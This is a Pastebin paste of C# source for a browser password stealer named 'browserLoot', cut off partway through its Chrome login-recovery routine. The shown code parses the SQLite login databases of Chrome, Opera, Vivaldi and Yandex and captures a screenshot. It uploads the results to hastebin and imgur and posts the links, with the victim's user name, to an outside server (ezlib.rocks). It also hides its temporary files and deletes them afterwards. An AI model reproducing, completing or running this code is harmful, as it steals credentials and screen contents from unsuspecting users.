API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Dec 5th, 2017
281
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 46.91 KB | None | 0 0
raw download clone embed print report
  1. using System;
  2. using System.Collections.Specialized;
  3. using System.Drawing;
  4. using System.Drawing.Imaging;
  5. using System.IO;
  6. using System.IO.Compression;
  7. using System.Net;
  8. using System.Runtime.InteropServices;
  9. using System.Text;
  10. using System.Text.RegularExpressions;
  11. using System.Windows.Forms;
  12. using Microsoft.VisualBasic;
  13. using Microsoft.VisualBasic.CompilerServices;
  14.  
  15. namespace browserLoot
  16. {
  17. public static class Program
  18. {
  19. public static string FnChrome = Guid.NewGuid() + "_chrome.txt";
  20. public static string FnOpera = Guid.NewGuid() + "_opera.txt";
  21. public static string FnVivaldi = Guid.NewGuid() + "_vivaldi.txt";
  22. public static string FnYandex = Guid.NewGuid() + "_yandex.txt";
  23.  
  24. private static readonly string VictimName = Environment.UserName;
  25.  
  26. private static string ChromeUploadUri { get; set; }
  27. private static string OperaUploadUri { get; set; }
  28. private static string VivaldiUploadUri { get; set; }
  29. private static string YandexUploadUri { get; set; }
  30. private static string ScreenshotUploadUri { get; set; }
  31.  
  32. [STAThread]
  33. private static void Main()
  34. {
  35. var webhookId = "//WEBHOOK ID//";
  36. var webhookToken = "//WEBHOOK TOKEN//";
  37.  
  38. if (webhookId.Contains("//") || webhookToken.Contains("//"))
  39. Environment.Exit(0);
  40.  
  41. DeleteFiles();
  42.  
  43. var recoveryClass = new Recovery();
  44. recoveryClass.Chrome();
  45. recoveryClass.Opera();
  46. recoveryClass.Vivaldi();
  47. recoveryClass.Yandex();
  48.  
  49. HideFiles();
  50. UploadFiles();
  51. DeleteFiles();
  52.  
  53. TakeScreenshot();
  54. SendLinks(webhookId, webhookToken);
  55. }
  56.  
  57. #region " File Handling "
  58.  
  59. private static void DeleteFiles()
  60. {
  61. if (File.Exists(FnChrome))
  62. File.Delete(FnChrome);
  63.  
  64. if (File.Exists(FnOpera))
  65. File.Delete(FnOpera);
  66.  
  67. if (File.Exists(FnVivaldi))
  68. File.Delete(FnVivaldi);
  69.  
  70. if (File.Exists(FnYandex))
  71. File.Delete(FnYandex);
  72. }
  73.  
  74. private static void HideFiles()
  75. {
  76. if (File.Exists(FnChrome))
  77. {
  78. File.GetAttributes(FnChrome);
  79. File.SetAttributes(FnChrome, File.GetAttributes(FnChrome) | FileAttributes.Hidden);
  80. }
  81.  
  82. if (File.Exists(FnOpera))
  83. {
  84. File.GetAttributes(FnOpera);
  85. File.SetAttributes(FnOpera, File.GetAttributes(FnOpera) | FileAttributes.Hidden);
  86. }
  87.  
  88. if (File.Exists(FnVivaldi))
  89. {
  90. File.GetAttributes(FnVivaldi);
  91. File.SetAttributes(FnVivaldi, File.GetAttributes(FnVivaldi) | FileAttributes.Hidden);
  92. }
  93.  
  94. if (File.Exists(FnYandex))
  95. {
  96. File.GetAttributes(FnYandex);
  97. File.SetAttributes(FnYandex, File.GetAttributes(FnYandex) | FileAttributes.Hidden);
  98. }
  99. }
  100.  
  101. #endregion
  102.  
  103. #region " Screenshot Handling "
  104.  
  105. private static bool UploadValues(WebClient w, string idImgur)
  106. {
  107. w.Headers.Add("Authorization", "Client-ID " + idImgur);
  108. return true;
  109. }
  110.  
  111. private static void TakeScreenshot()
  112. {
  113. if (Directory.Exists(Environment.GetFolderPath(Environment.SpecialFolder.MyPictures) + @"\Screenshots"))
  114. {
  115. Directory.Delete(Environment.GetFolderPath(Environment.SpecialFolder.MyPictures) + @"\Screenshots",
  116. true);
  117.  
  118. Directory.CreateDirectory(Environment.GetFolderPath(Environment.SpecialFolder.MyPictures) +
  119. @"\Screenshots");
  120.  
  121. var screenshot = Environment.GetFolderPath(Environment.SpecialFolder.MyPictures) + @"\Screenshots\" +
  122. "[" + DateTime.Now.ToString().Replace(':', ' ').Replace('/', ' ') + "].png";
  123. var bmpScreenshot = new Bitmap(Screen.PrimaryScreen.Bounds.Width, Screen.PrimaryScreen.Bounds.Height,
  124. PixelFormat.Format32bppArgb);
  125. var gfxScreenshot = Graphics.FromImage(bmpScreenshot);
  126. gfxScreenshot.CopyFromScreen(Screen.PrimaryScreen.Bounds.X, Screen.PrimaryScreen.Bounds.Y, 0, 0,
  127. Screen.PrimaryScreen.Bounds.Size, CopyPixelOperation.SourceCopy);
  128. bmpScreenshot.Save(screenshot, ImageFormat.Png);
  129.  
  130. var sLink = string.Empty;
  131. var values = new NameValueCollection
  132. {
  133. {"image", Convert.ToBase64String(File.ReadAllBytes(screenshot))},
  134. {"title", Path.GetFileNameWithoutExtension(screenshot)}
  135. };
  136.  
  137. using (var w = new WebClient())
  138. {
  139. if (UploadValues(w, "23c111099c786a9"))
  140. using (var sr =
  141. new StreamReader(
  142. new MemoryStream(w.UploadValues(new Uri("https://api.imgur.com/3/upload.xml"),
  143. values))))
  144. {
  145. sLink = sr.ReadToEnd();
  146. }
  147. }
  148. if (!string.IsNullOrEmpty(sLink))
  149. {
  150. ScreenshotUploadUri = new Regex(@"<link>(.*?)</link>", RegexOptions.Multiline).Match(sLink)
  151. .Groups[1]
  152. .Value.Trim();
  153. Directory.Delete(Environment.GetFolderPath(Environment.SpecialFolder.MyPictures) + @"\Screenshots",
  154. true);
  155. }
  156. }
  157. else
  158. {
  159. Directory.CreateDirectory(Environment.GetFolderPath(Environment.SpecialFolder.MyPictures) +
  160. @"\Screenshots");
  161.  
  162. var screenshot = Environment.GetFolderPath(Environment.SpecialFolder.MyPictures) + @"\Screenshots\" +
  163. "[" + DateTime.Now.ToString().Replace(':', ' ').Replace('/', ' ') + "].png";
  164. var bmpScreenshot = new Bitmap(Screen.PrimaryScreen.Bounds.Width, Screen.PrimaryScreen.Bounds.Height,
  165. PixelFormat.Format32bppArgb);
  166. var gfxScreenshot = Graphics.FromImage(bmpScreenshot);
  167. gfxScreenshot.CopyFromScreen(Screen.PrimaryScreen.Bounds.X, Screen.PrimaryScreen.Bounds.Y, 0, 0,
  168. Screen.PrimaryScreen.Bounds.Size, CopyPixelOperation.SourceCopy);
  169. bmpScreenshot.Save(screenshot, ImageFormat.Png);
  170.  
  171. var sLink = string.Empty;
  172. var values = new NameValueCollection
  173. {
  174. {"image", Convert.ToBase64String(File.ReadAllBytes(screenshot))},
  175. {"title", Path.GetFileNameWithoutExtension(screenshot)}
  176. };
  177.  
  178. using (var w = new WebClient())
  179. {
  180. if (UploadValues(w, "23c111099c786a9"))
  181. using (var sr =
  182. new StreamReader(
  183. new MemoryStream(w.UploadValues(new Uri("https://api.imgur.com/3/upload.xml"),
  184. values))))
  185. {
  186. sLink = sr.ReadToEnd();
  187. }
  188. }
  189. if (!string.IsNullOrEmpty(sLink))
  190. {
  191. ScreenshotUploadUri = new Regex(@"<link>(.*?)</link>", RegexOptions.Multiline).Match(sLink)
  192. .Groups[1]
  193. .Value.Trim();
  194. Directory.Delete(Environment.GetFolderPath(Environment.SpecialFolder.MyPictures) + @"\Screenshots",
  195. true);
  196. }
  197. }
  198. }
  199.  
  200. #endregion
  201.  
  202. #region " Server Handling "
  203.  
  204. private static void UploadFiles()
  205. {
  206. if (File.Exists(FnChrome))
  207. using (var sr = new StreamReader(FnChrome))
  208. {
  209. var line = sr.ReadToEnd();
  210.  
  211. if (line.Contains("V3rmillion"))
  212. Environment.Exit(0);
  213.  
  214. using (var webClient = new WebClient())
  215. {
  216. webClient.Proxy = null;
  217. webClient.Headers.Add("content-type", "text/plain");
  218. webClient.Headers.Add("user-agent",
  219. "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36");
  220. var webResponse = webClient.UploadString("https://hastebin.com/documents", "POST", line);
  221. ChromeUploadUri = "https://hastebin.com/" + webResponse.Replace("\"key\":\"", "")
  222. .Replace("\"}", "").Replace(" ", "").Replace("{", "");
  223. }
  224. }
  225.  
  226. if (File.Exists(FnVivaldi))
  227. using (var sr = new StreamReader(FnVivaldi))
  228. {
  229. var line = sr.ReadToEnd();
  230.  
  231. if (line.Contains("V3rmillion"))
  232. Environment.Exit(0);
  233.  
  234. using (var webClient = new WebClient())
  235. {
  236. webClient.Proxy = null;
  237. webClient.Headers.Add("content-type", "text/plain");
  238. webClient.Headers.Add("user-agent",
  239. "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36");
  240. var webResponse = webClient.UploadString("https://hastebin.com/documents", "POST", line);
  241. VivaldiUploadUri = "https://hastebin.com/" + webResponse.Replace("\"key\":\"", "")
  242. .Replace("\"}", "").Replace(" ", "").Replace("{", "");
  243. }
  244. }
  245.  
  246. if (File.Exists(FnOpera))
  247. using (var sr = new StreamReader(FnOpera))
  248. {
  249. var line = sr.ReadToEnd();
  250.  
  251. if (line.Contains("V3rmillion"))
  252. Environment.Exit(0);
  253.  
  254. using (var webClient = new WebClient())
  255. {
  256. webClient.Proxy = null;
  257. webClient.Headers.Add("content-type", "text/plain");
  258. webClient.Headers.Add("user-agent",
  259. "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36");
  260. var webResponse = webClient.UploadString("https://hastebin.com/documents", "POST", line);
  261. OperaUploadUri = "https://hastebin.com/" + webResponse.Replace("\"key\":\"", "")
  262. .Replace("\"}", "").Replace(" ", "").Replace("{", "");
  263. }
  264. }
  265.  
  266. if (File.Exists(FnYandex))
  267. using (var sr = new StreamReader(FnYandex))
  268. {
  269. var line = sr.ReadToEnd();
  270.  
  271. if (line.Contains("V3rmillion"))
  272. Environment.Exit(0);
  273.  
  274. using (var webClient = new WebClient())
  275. {
  276. webClient.Proxy = null;
  277. webClient.Headers.Add("content-type", "text/plain");
  278. webClient.Headers.Add("user-agent",
  279. "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36");
  280. var webResponse = webClient.UploadString("https://hastebin.com/documents", "POST", line);
  281. YandexUploadUri = "https://hastebin.com/" + webResponse.Replace("\"key\":\"", "")
  282. .Replace("\"}", "").Replace(" ", "").Replace("{", "");
  283. }
  284. }
  285. }
  286.  
  287. public static void SendLinks(string webhookId, string webhookToken)
  288. {
  289. using (var webClient = new WebClient())
  290. {
  291. if (ChromeUploadUri == null)
  292. ChromeUploadUri = "Not installed.";
  293. if (VivaldiUploadUri == null)
  294. VivaldiUploadUri = "Not installed.";
  295. if (OperaUploadUri == null)
  296. OperaUploadUri = "Not installed.";
  297. if (YandexUploadUri == null)
  298. YandexUploadUri = "Not installed.";
  299.  
  300.  
  301. var postQuery =
  302. "ChromeUploadUri=" + ChromeUploadUri +"&VivaldiUploadUri=" + VivaldiUploadUri + "&OperaUploadUri=" + OperaUploadUri + "&YandexUploadUri=" + YandexUploadUri + "&VictimName=" + VictimName + "&webhookId=" + webhookId + "&webhookToken=" + webhookToken + "&ScreenshotUploadUri=" + ScreenshotUploadUri;
  303.  
  304. webClient.Proxy = null;
  305. webClient.Headers.Add("content-type", "application/x-www-form-urlencoded");
  306. webClient.UploadString("https://www.ezlib.rocks/customapi/Gz6l7Re31r/SendLinks", "POST", postQuery);
  307. }
  308. }
  309.  
  310. #endregion
  311. }
  312.  
  313. // USG HERE 1
  314.  
  315. #region " Database "
  316.  
  317. public class SqliteHandler
  318. {
  319. private readonly byte[] db_bytes;
  320. private readonly ulong encoding;
  321. private readonly ushort page_size;
  322. private readonly byte[] SQLDataTypeSize = {0, 1, 2, 3, 4, 6, 8, 8, 0, 0};
  323. private string[] field_names;
  324. private sqlite_master_entry[] master_table_entries;
  325. private table_entry[] table_entries;
  326.  
  327. public SqliteHandler(string baseName)
  328. {
  329. if (File.Exists(baseName))
  330. {
  331. FileSystem.FileOpen(1, baseName, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared, -1);
  332. var str = Strings.Space((int) FileSystem.LOF(1));
  333. FileSystem.FileGet(1, ref str, -1L, false);
  334. FileSystem.FileClose(1);
  335. db_bytes = Encoding.Default.GetBytes(str);
  336. if (Encoding.Default.GetString(db_bytes, 0, 15).CompareTo("SQLite format 3") != 0)
  337. throw new Exception("Not a valid SQLite 3 Database File");
  338. if (db_bytes[0x34] != 0)
  339. throw new Exception("Auto-vacuum capable database is not supported");
  340. page_size = (ushort) ConvertToInteger(0x10, 2);
  341. encoding = ConvertToInteger(0x38, 4);
  342. if (decimal.Compare(new decimal(encoding), decimal.Zero) == 0)
  343. encoding = 1L;
  344. ReadMasterTable(100L);
  345. }
  346. }
  347.  
  348. private ulong ConvertToInteger(int startIndex, int Size)
  349. {
  350. if ((Size > 8) | (Size == 0))
  351. return 0L;
  352. ulong num2 = 0L;
  353. var num4 = Size - 1;
  354. for (var i = 0; i <= num4; i++)
  355. num2 = (num2 << 8) | db_bytes[startIndex + i];
  356. return num2;
  357. }
  358.  
  359. private long CVL(int startIndex, int endIndex)
  360. {
  361. endIndex++;
  362. var buffer = new byte[8];
  363. var num4 = endIndex - startIndex;
  364. var flag = false;
  365. if ((num4 == 0) | (num4 > 9))
  366. return 0L;
  367. if (num4 == 1)
  368. {
  369. buffer[0] = (byte) (db_bytes[startIndex] & 0x7f);
  370. return BitConverter.ToInt64(buffer, 0);
  371. }
  372. if (num4 == 9)
  373. flag = true;
  374. var num2 = 1;
  375. var num3 = 7;
  376. var index = 0;
  377. if (flag)
  378. {
  379. buffer[0] = db_bytes[endIndex - 1];
  380. endIndex--;
  381. index = 1;
  382. }
  383. var num7 = startIndex;
  384. for (var i = endIndex - 1; i >= num7; i += -1)
  385. if (i - 1 >= startIndex)
  386. {
  387. buffer[index] = (byte) (((byte) (db_bytes[i] >> ((num2 - 1) & 7)) & (0xff >> num2)) |
  388. (byte) (db_bytes[i - 1] << (num3 & 7)));
  389. num2++;
  390. index++;
  391. num3--;
  392. }
  393. else if (!flag)
  394. {
  395. buffer[index] = (byte) ((byte) (db_bytes[i] >> ((num2 - 1) & 7)) & (0xff >> num2));
  396. }
  397. return BitConverter.ToInt64(buffer, 0);
  398. }
  399.  
  400. public int GetRowCount()
  401. {
  402. return table_entries.Length;
  403. }
  404.  
  405. public string[] GetTableNames()
  406. {
  407. string[] strArray2 = null;
  408. var index = 0;
  409. var num3 = master_table_entries.Length - 1;
  410. for (var i = 0; i <= num3; i++)
  411. if (master_table_entries[i].item_type == "table")
  412. {
  413. strArray2 = (string[]) Utils.CopyArray(strArray2, new string[index + 1]);
  414. strArray2[index] = master_table_entries[i].item_name;
  415. index++;
  416. }
  417. return strArray2;
  418. }
  419.  
  420. public string GetValue(int row_num, int field)
  421. {
  422. if (row_num >= table_entries.Length)
  423. return null;
  424. if (field >= table_entries[row_num].content.Length)
  425. return null;
  426. return table_entries[row_num].content[field];
  427. }
  428.  
  429. public string GetValue(int row_num, string field)
  430. {
  431. var num = -1;
  432. var length = field_names.Length - 1;
  433. for (var i = 0; i <= length; i++)
  434. if (field_names[i].ToLower().CompareTo(field.ToLower()) == 0)
  435. {
  436. num = i;
  437. break;
  438. }
  439. if (num == -1)
  440. return null;
  441. return GetValue(row_num, num);
  442. }
  443.  
  444. private int GVL(int startIndex)
  445. {
  446. if (startIndex > db_bytes.Length)
  447. return 0;
  448. var num3 = startIndex + 8;
  449. for (var i = startIndex; i <= num3; i++)
  450. {
  451. if (i > db_bytes.Length - 1)
  452. return 0;
  453. if ((db_bytes[i] & 0x80) != 0x80)
  454. return i;
  455. }
  456. return startIndex + 8;
  457. }
  458.  
  459. private bool IsOdd(long value)
  460. {
  461. return (value & 1L) == 1L;
  462. }
  463.  
  464. private void ReadMasterTable(ulong Offset)
  465. {
  466. if (db_bytes[(int) Offset] == 13)
  467. {
  468. var num2 = Convert.ToUInt16(
  469. decimal.Subtract(
  470. new decimal(ConvertToInteger(Convert.ToInt32(decimal.Add(new decimal(Offset), 3M)), 2)),
  471. decimal.One));
  472. var length = 0;
  473. if (master_table_entries != null)
  474. {
  475. length = master_table_entries.Length;
  476. master_table_entries = (sqlite_master_entry[]) Utils.CopyArray(master_table_entries,
  477. new sqlite_master_entry[master_table_entries.Length + num2 + 1]);
  478. }
  479. else
  480. {
  481. master_table_entries = new sqlite_master_entry[num2 + 1];
  482. }
  483. int num13 = num2;
  484. for (var i = 0; i <= num13; i++)
  485. {
  486. var num = ConvertToInteger(
  487. Convert.ToInt32(decimal.Add(decimal.Add(new decimal(Offset), 8M), new decimal(i * 2))), 2);
  488. if (decimal.Compare(new decimal(Offset), 100M) != 0)
  489. num += Offset;
  490. var endIndex = GVL((int) num);
  491. var num7 = CVL((int) num, endIndex);
  492. var num6 = GVL(Convert.ToInt32(
  493. decimal.Add(
  494. decimal.Add(new decimal(num), decimal.Subtract(new decimal(endIndex), new decimal(num))),
  495. decimal.One)));
  496. master_table_entries[length + i].row_id =
  497. CVL(
  498. Convert.ToInt32(decimal.Add(
  499. decimal.Add(new decimal(num),
  500. decimal.Subtract(new decimal(endIndex), new decimal(num))), decimal.One)), num6);
  501. num = Convert.ToUInt64(decimal.Add(
  502. decimal.Add(new decimal(num), decimal.Subtract(new decimal(num6), new decimal(num))),
  503. decimal.One));
  504. endIndex = GVL((int) num);
  505. num6 = endIndex;
  506. var num5 = CVL((int) num, endIndex);
  507. var numArray = new long[5];
  508. var index = 0;
  509. do
  510. {
  511. endIndex = num6 + 1;
  512. num6 = GVL(endIndex);
  513. numArray[index] = CVL(endIndex, num6);
  514. if (numArray[index] > 9L)
  515. if (IsOdd(numArray[index]))
  516. numArray[index] = (long) Math.Round((numArray[index] - 13L) / 2.0);
  517. else
  518. numArray[index] = (long) Math.Round((numArray[index] - 12L) / 2.0);
  519. else
  520. numArray[index] = SQLDataTypeSize[(int) numArray[index]];
  521. index++;
  522. } while (index <= 4);
  523. if (decimal.Compare(new decimal(encoding), decimal.One) == 0)
  524. master_table_entries[length + i].item_type = Encoding.Default.GetString(db_bytes,
  525. Convert.ToInt32(decimal.Add(new decimal(num), new decimal(num5))), (int) numArray[0]);
  526. else if (decimal.Compare(new decimal(encoding), 2M) == 0)
  527. master_table_entries[length + i].item_type = Encoding.Unicode.GetString(db_bytes,
  528. Convert.ToInt32(decimal.Add(new decimal(num), new decimal(num5))), (int) numArray[0]);
  529. else if (decimal.Compare(new decimal(encoding), 3M) == 0)
  530. master_table_entries[length + i].item_type = Encoding.BigEndianUnicode.GetString(db_bytes,
  531. Convert.ToInt32(decimal.Add(new decimal(num), new decimal(num5))), (int) numArray[0]);
  532. if (decimal.Compare(new decimal(encoding), decimal.One) == 0)
  533. master_table_entries[length + i].item_name = Encoding.Default.GetString(db_bytes,
  534. Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num5)),
  535. new decimal(numArray[0]))), (int) numArray[1]);
  536. else if (decimal.Compare(new decimal(encoding), 2M) == 0)
  537. master_table_entries[length + i].item_name = Encoding.Unicode.GetString(db_bytes,
  538. Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num5)),
  539. new decimal(numArray[0]))), (int) numArray[1]);
  540. else if (decimal.Compare(new decimal(encoding), 3M) == 0)
  541. master_table_entries[length + i].item_name = Encoding.BigEndianUnicode.GetString(db_bytes,
  542. Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num5)),
  543. new decimal(numArray[0]))), (int) numArray[1]);
  544. master_table_entries[length + i].root_num =
  545. (long) ConvertToInteger(
  546. Convert.ToInt32(decimal.Add(
  547. decimal.Add(
  548. decimal.Add(decimal.Add(new decimal(num), new decimal(num5)),
  549. new decimal(numArray[0])), new decimal(numArray[1])),
  550. new decimal(numArray[2]))), (int) numArray[3]);
  551. if (decimal.Compare(new decimal(encoding), decimal.One) == 0)
  552. master_table_entries[length + i].sql_statement = Encoding.Default.GetString(db_bytes,
  553. Convert.ToInt32(decimal.Add(
  554. decimal.Add(
  555. decimal.Add(
  556. decimal.Add(decimal.Add(new decimal(num), new decimal(num5)),
  557. new decimal(numArray[0])), new decimal(numArray[1])),
  558. new decimal(numArray[2])), new decimal(numArray[3]))), (int) numArray[4]);
  559. else if (decimal.Compare(new decimal(encoding), 2M) == 0)
  560. master_table_entries[length + i].sql_statement = Encoding.Unicode.GetString(db_bytes,
  561. Convert.ToInt32(decimal.Add(
  562. decimal.Add(
  563. decimal.Add(
  564. decimal.Add(decimal.Add(new decimal(num), new decimal(num5)),
  565. new decimal(numArray[0])), new decimal(numArray[1])),
  566. new decimal(numArray[2])), new decimal(numArray[3]))), (int) numArray[4]);
  567. else if (decimal.Compare(new decimal(encoding), 3M) == 0)
  568. master_table_entries[length + i].sql_statement = Encoding.BigEndianUnicode.GetString(db_bytes,
  569. Convert.ToInt32(decimal.Add(
  570. decimal.Add(
  571. decimal.Add(
  572. decimal.Add(decimal.Add(new decimal(num), new decimal(num5)),
  573. new decimal(numArray[0])), new decimal(numArray[1])),
  574. new decimal(numArray[2])), new decimal(numArray[3]))), (int) numArray[4]);
  575. }
  576. }
  577. else if (db_bytes[(int) Offset] == 5)
  578. {
  579. var num11 = Convert.ToUInt16(
  580. decimal.Subtract(
  581. new decimal(ConvertToInteger(Convert.ToInt32(decimal.Add(new decimal(Offset), 3M)), 2)),
  582. decimal.One));
  583. int num14 = num11;
  584. for (var j = 0; j <= num14; j++)
  585. {
  586. var startIndex =
  587. (ushort) ConvertToInteger(
  588. Convert.ToInt32(decimal.Add(decimal.Add(new decimal(Offset), 12M), new decimal(j * 2))), 2);
  589. if (decimal.Compare(new decimal(Offset), 100M) == 0)
  590. ReadMasterTable(Convert.ToUInt64(
  591. decimal.Multiply(
  592. decimal.Subtract(new decimal(ConvertToInteger(startIndex, 4)), decimal.One),
  593. new decimal(page_size))));
  594. else
  595. ReadMasterTable(Convert.ToUInt64(
  596. decimal.Multiply(
  597. decimal.Subtract(new decimal(ConvertToInteger((int) (Offset + startIndex), 4)),
  598. decimal.One), new decimal(page_size))));
  599. }
  600. ReadMasterTable(Convert.ToUInt64(
  601. decimal.Multiply(
  602. decimal.Subtract(
  603. new decimal(ConvertToInteger(Convert.ToInt32(decimal.Add(new decimal(Offset), 8M)), 4)),
  604. decimal.One), new decimal(page_size))));
  605. }
  606. }
  607.  
  608. public bool ReadTable(string TableName)
  609. {
  610. var index = -1;
  611. var length = master_table_entries.Length - 1;
  612. for (var i = 0; i <= length; i++)
  613. if (master_table_entries[i].item_name.ToLower().CompareTo(TableName.ToLower()) == 0)
  614. {
  615. index = i;
  616. break;
  617. }
  618. if (index == -1)
  619. return false;
  620. var strArray = master_table_entries[index].sql_statement
  621. .Substring(master_table_entries[index].sql_statement.IndexOf("(") + 1).Split(',');
  622. var num6 = strArray.Length - 1;
  623. for (var j = 0; j <= num6; j++)
  624. {
  625. strArray[j] = strArray[j].TrimStart();
  626. var num4 = strArray[j].IndexOf(" ");
  627. if (num4 > 0)
  628. strArray[j] = strArray[j].Substring(0, num4);
  629. if (strArray[j].IndexOf("UNIQUE") == 0)
  630. break;
  631. field_names = (string[]) Utils.CopyArray(field_names, new string[j + 1]);
  632. field_names[j] = strArray[j];
  633. }
  634. return ReadTableFromOffset((ulong) ((master_table_entries[index].root_num - 1L) * page_size));
  635. }
  636.  
  637. private bool ReadTableFromOffset(ulong Offset)
  638. {
  639. if (db_bytes[(int) Offset] == 13)
  640. {
  641. var num2 = Convert.ToInt32(decimal.Subtract(
  642. new decimal(ConvertToInteger(Convert.ToInt32(decimal.Add(new decimal(Offset), 3M)), 2)),
  643. decimal.One));
  644. var length = 0;
  645. if (table_entries != null)
  646. {
  647. length = table_entries.Length;
  648. table_entries =
  649. (table_entry[]) Utils.CopyArray(table_entries,
  650. new table_entry[table_entries.Length + num2 + 1]);
  651. }
  652. else
  653. {
  654. table_entries = new table_entry[num2 + 1];
  655. }
  656. var num16 = num2;
  657. for (var i = 0; i <= num16; i++)
  658. {
  659. record_header_field[] _fieldArray = null;
  660. var num = ConvertToInteger(
  661. Convert.ToInt32(decimal.Add(decimal.Add(new decimal(Offset), 8M), new decimal(i * 2))), 2);
  662. if (decimal.Compare(new decimal(Offset), 100M) != 0)
  663. num += Offset;
  664. var endIndex = GVL((int) num);
  665. var num9 = CVL((int) num, endIndex);
  666. var num8 = GVL(Convert.ToInt32(
  667. decimal.Add(
  668. decimal.Add(new decimal(num), decimal.Subtract(new decimal(endIndex), new decimal(num))),
  669. decimal.One)));
  670. table_entries[length + i].row_id =
  671. CVL(
  672. Convert.ToInt32(decimal.Add(
  673. decimal.Add(new decimal(num),
  674. decimal.Subtract(new decimal(endIndex), new decimal(num))), decimal.One)), num8);
  675. num = Convert.ToUInt64(decimal.Add(
  676. decimal.Add(new decimal(num), decimal.Subtract(new decimal(num8), new decimal(num))),
  677. decimal.One));
  678. endIndex = GVL((int) num);
  679. num8 = endIndex;
  680. var num7 = CVL((int) num, endIndex);
  681. var num10 = Convert.ToInt64(decimal.Add(decimal.Subtract(new decimal(num), new decimal(endIndex)),
  682. decimal.One));
  683. for (var j = 0; num10 < num7; j++)
  684. {
  685. _fieldArray =
  686. (record_header_field[]) Utils.CopyArray(_fieldArray, new record_header_field[j + 1]);
  687. endIndex = num8 + 1;
  688. num8 = GVL(endIndex);
  689. _fieldArray[j].type = CVL(endIndex, num8);
  690. if (_fieldArray[j].type > 9L)
  691. if (IsOdd(_fieldArray[j].type))
  692. _fieldArray[j].size = (long) Math.Round((_fieldArray[j].type - 13L) / 2.0);
  693. else
  694. _fieldArray[j].size = (long) Math.Round((_fieldArray[j].type - 12L) / 2.0);
  695. else
  696. _fieldArray[j].size = SQLDataTypeSize[(int) _fieldArray[j].type];
  697. num10 = num10 + (num8 - endIndex) + 1L;
  698. }
  699. table_entries[length + i].content = new string[_fieldArray.Length - 1 + 1];
  700. var num4 = 0;
  701. var num17 = _fieldArray.Length - 1;
  702. for (var k = 0; k <= num17; k++)
  703. {
  704. if (_fieldArray[k].type > 9L)
  705. if (!IsOdd(_fieldArray[k].type))
  706. {
  707. if (decimal.Compare(new decimal(encoding), decimal.One) == 0)
  708. table_entries[length + i].content[k] = Encoding.Default.GetString(db_bytes,
  709. Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num7)),
  710. new decimal(num4))), (int) _fieldArray[k].size);
  711. else if (decimal.Compare(new decimal(encoding), 2M) == 0)
  712. table_entries[length + i].content[k] = Encoding.Unicode.GetString(db_bytes,
  713. Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num7)),
  714. new decimal(num4))), (int) _fieldArray[k].size);
  715. else if (decimal.Compare(new decimal(encoding), 3M) == 0)
  716. table_entries[length + i].content[k] = Encoding.BigEndianUnicode.GetString(db_bytes,
  717. Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num7)),
  718. new decimal(num4))), (int) _fieldArray[k].size);
  719. }
  720. else
  721. {
  722. table_entries[length + i].content[k] = Encoding.Default.GetString(db_bytes,
  723. Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num7)),
  724. new decimal(num4))), (int) _fieldArray[k].size);
  725. }
  726. else
  727. table_entries[length + i].content[k] =
  728. Conversions.ToString(
  729. ConvertToInteger(
  730. Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num7)),
  731. new decimal(num4))), (int) _fieldArray[k].size));
  732. num4 += (int) _fieldArray[k].size;
  733. }
  734. }
  735. }
  736. else if (db_bytes[(int) Offset] == 5)
  737. {
  738. var num14 = Convert.ToUInt16(
  739. decimal.Subtract(
  740. new decimal(ConvertToInteger(Convert.ToInt32(decimal.Add(new decimal(Offset), 3M)), 2)),
  741. decimal.One));
  742. int num18 = num14;
  743. for (var m = 0; m <= num18; m++)
  744. {
  745. var num13 = (ushort) ConvertToInteger(
  746. Convert.ToInt32(decimal.Add(decimal.Add(new decimal(Offset), 12M), new decimal(m * 2))), 2);
  747. ReadTableFromOffset(Convert.ToUInt64(
  748. decimal.Multiply(
  749. decimal.Subtract(new decimal(ConvertToInteger((int) (Offset + num13), 4)), decimal.One),
  750. new decimal(page_size))));
  751. }
  752. ReadTableFromOffset(Convert.ToUInt64(
  753. decimal.Multiply(
  754. decimal.Subtract(
  755. new decimal(ConvertToInteger(Convert.ToInt32(decimal.Add(new decimal(Offset), 8M)), 4)),
  756. decimal.One), new decimal(page_size))));
  757. }
  758. return true;
  759. }
  760.  
  761. [StructLayout(LayoutKind.Sequential)]
  762. private struct record_header_field
  763. {
  764. public long size;
  765. public long type;
  766. }
  767.  
  768. [StructLayout(LayoutKind.Sequential)]
  769. private struct sqlite_master_entry
  770. {
  771. public long row_id;
  772. public string item_type;
  773. public string item_name;
  774. public readonly string astable_name;
  775. public long root_num;
  776. public string sql_statement;
  777. }
  778.  
  779. [StructLayout(LayoutKind.Sequential)]
  780. private struct table_entry
  781. {
  782. public long row_id;
  783. public string[] content;
  784. }
  785. }
  786.  
  787. #endregion
  788.  
  789. // USG HERE 2
  790.  
  791. #region " Recovery "
  792.  
  793. public class Recovery
  794. {
  795. public void Chrome()
  796. {
  797. var installationPath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) +
  798. "\\Google\\Chrome\\User Data\\Default\\Login Data";
  799. var searchTerm = string.Empty;
  800. var data = string.Empty;
  801. try
  802. {
  803. var sqlDatabase = new SqliteHandler(installationPath);
  804. sqlDatabase.ReadTable("logins");
  805. if (File.Exists(installationPath))
  806. for (var i = 0; i <= sqlDatabase.GetRowCount() - 1; i++)
  807. try
  808. {
  809. var host = sqlDatabase.GetValue(i, "origin_url");
  810. var user = sqlDatabase.GetValue(i, "username_value");
